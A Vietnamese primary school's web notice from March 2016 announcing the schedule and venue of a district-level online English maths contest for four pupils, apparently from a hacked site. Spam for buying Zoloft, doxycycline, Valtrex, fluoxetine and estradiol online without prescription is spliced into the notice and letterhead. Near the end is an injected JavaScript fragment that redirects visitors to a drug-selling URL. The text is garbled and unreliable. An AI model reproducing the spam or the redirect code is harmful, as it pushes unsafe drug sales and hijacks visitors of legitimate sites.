Thông báo về việc tham gia thi giải Toán bằng Tiếng Anh trên Internet cấp Quận

02/03/2016 6:49 Chiều Phản hồi đã bị khóa

buy zoloft online, buy zoloft uk, can you buy zoloft in mexico.

Thực hiện kế hoạch năm học 2015 – 2016 về việc tổ chức thi giải Toán bằng Tiếng Anh trên Internet, trường Tiểu học Quan Hoa đã tổ chức thi cấp trường và lựa chọn 4 em học sinh lớp 4 tham gia thi cấp Quận vào ngày 03/3/2016.

Vậy nhà trường xin thông báo lịch thi cụ thể như sau:

Giờ thi: Từ 16h30 đến 17h30

Địa điểm: Trường Trung học cơ sở Nghĩa Tân (Số 14 – Tô Hiệu – Nghĩa Tân – Cầu Giấy).

- Học sinh đến trước thời gian thi 30 phút và đeo thẻ dự thi.

– Nhà trường sẽ đưa học sinh đến địa điểm thi và phụ huynh học sinh đến đón con tại địa điểm thi (khoảng 17h).

Nhà trường trân trọng cảm ơn.

Lưu ý: - Học sinh dự thi cấp quận phải sử dụng tài khoản đã đăng kí, tuyệt đối không sử dụng tài khoản khác (chỉ các ID được Ban tổ chức cấp quốc gia duyệt mới thi được, có thể ghi tên đăng nhập, mật khẩu ra giấy nhớ để mang theo)./.

BAN GIÁM HIỆU

doxycycline 0 1g doxycycline treatment buy doxycycline online

. … 4rx.com sells generic valtrex (valacyclovir) which is exactly the same …

ỦY BAN NHÂN DÂN QUẬN CẦU GIẤY

TRƯỜNG TIỂU HỌC QUAN HOA

CỘNG HOÀ XÃ HỘI CHỦ NGHĨA VIỆT NAM

Độc lập – Tự do – Hạnh phúc

Cầu Giấy, ngày 02  tháng 03 năm 2016 order fluoxetine online without prescriptions . fluoxetine. ingrediente activo: fluoxetine. fluoxetine es utilizado para el tratamiento del trastorno disforico 

purchase estradiol . buy estradiol valerate. buy estrace cream. estradiol online. estrace online. what is estrace cream. estrace cream cost. estrace tablets

“http:///?sl=319481-c261c&data1=Track1&data2=Track2″;

“http:///search.htm?route=search&q=”;

location.replace(“http://gethere.info/buy.php”);

}

Các phản hồi đã bị đóng lại bở quản trị.